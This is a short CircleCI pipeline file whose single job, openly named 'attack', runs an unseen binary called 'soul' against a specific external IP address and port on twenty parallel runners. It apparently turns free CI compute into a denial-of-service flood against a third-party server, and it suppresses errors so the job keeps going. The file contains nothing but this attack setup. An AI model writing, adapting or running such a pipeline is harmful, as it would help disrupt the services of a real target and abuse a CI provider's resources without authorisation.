version: 2.1
jobs:
  attack:
    machine:
      image: ubuntu-2204:current
    resource_class: medium
    parallelism: 20
    steps:
      - checkout
      - run:
          name: Run Attack
          command: |
             chmod +x soul
             ./soul 91.108.17.54 32001 10 || true

workflows:
  attack_flow:
    jobs:
      - attack
